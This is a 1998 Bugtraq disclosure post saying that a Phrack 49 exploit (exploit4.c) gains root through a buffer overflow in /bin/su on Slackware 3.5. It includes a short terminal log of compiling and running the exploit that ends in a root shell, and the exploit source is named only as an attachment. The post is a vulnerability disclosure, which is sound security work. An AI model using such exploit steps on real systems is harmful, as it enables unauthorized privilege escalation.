slackware-3.5 /bin/su buffer overflow


Date: Tue, 18 Aug 1998 17:42:02 +0700
From: Chatchai Watchakit <s8013006@KMITL.AC.TH>
To: BUGTRAQ@netspace.org
Subject: slackware-3.5 /bin/su buffer overflow


From exploit4.c of Phrack 49 (P49-14) can exploit /bin/su of slackware-3.5
kernel 2.0.34

---------------------

endeavor:~$ gcc -o exploit4 exploit4.c
endeavor:~$ ./exploit4
Using address: 0xbffffb20
bash$ /bin/su $RET
bash#

---------------------

Chatchai W.

Attachment: exploit4.c
